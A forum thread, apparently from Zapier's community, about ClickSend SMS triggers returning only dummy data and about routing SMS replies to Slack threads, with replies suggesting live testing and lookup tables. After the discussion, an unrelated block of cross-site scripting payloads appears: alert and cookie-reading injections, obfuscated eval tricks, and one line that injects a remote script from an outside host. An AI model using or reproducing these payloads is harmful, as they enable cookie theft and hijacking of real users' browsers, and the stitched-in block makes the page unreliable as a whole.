Skip to main content

Hi all, I have a dedicated SMS number on ClickSend, and can receive SMS messages to ClickSend’s dashboard.

I can SEND messages from Zapier via ClickSend without issue.

When I receive a ClickSend SMS message and attempt to create a new Zapier trigger based on that, Zapier does not see any SMS messages in my inbox and only generates test data for the triggers portion. 

Hi @AdamInMO 

Some Zap apps only return representative dummy data for trigger step records so you can configure the Zap action steps.

Try configuring the Zap, then turn the Zap ON, and test live.

Check the Zap Runs history details to see the DATA IN/OUT for each step to help you troubleshoot: https://zapier.com/app/history/

@Troy Tessalone , thanks for the input. It DOES work in the way you suggested, but what a huge pain in the butt trying to configure and route incoming messages using an example as opposed to the message I sent. Thanks for the input, appreciate you!

(Edit : Actually, the more I think about it, this isn’t a reflection of your input, but this doesn’t actually solve my problem.)

I’m sending text messages OUT via ClickSend, and that same message gets sent as a Slack message (which creates a Slack message ID); someone replying to the message in Slack should send additional text messages to the person who received the SMS in the first place, and someone replying to the SMS should reply in that Slack thread. (In this way the conversation is asymmetrical, one person can be having the conversation via Slack/Teams and the other person can be having it via SMS.)

Since I use one single outbound ClickSend SMS dedicated number, if I can’t setup my Zap by referring to a specific Slack, it’s near-impossible to setup the routing. 

@AdamInMO

You may need to use the concept of “Find/Search” action step in the Zap to find the correct message OR use the concept of a Lookup Table.

Dec:
#javascript:alert(2);
alert##
/
asdf
+type=image+src=1+onerror=alert(1)>
'alert(1)'.replace(/.+/,eval)

nload=parent[/al/.source+/ert/.source] (1)>
nload=parent[/al/.source.concat(/ert/.source)] (2)>
a
(A(%22onerror='alert%60123%60'test))/
a'-alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
alert(document['cookie'])
';alert(document.cookie)//
confirm?.(1)
ignition/scripts/-->%20onload=alert%28document.domain%29>
%20onload=alert%28document.domain%29>
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
%26%2302java%26%23115cript:alert(document.domain)
url=%26%2302java%26%23115cript:alert(document.domain)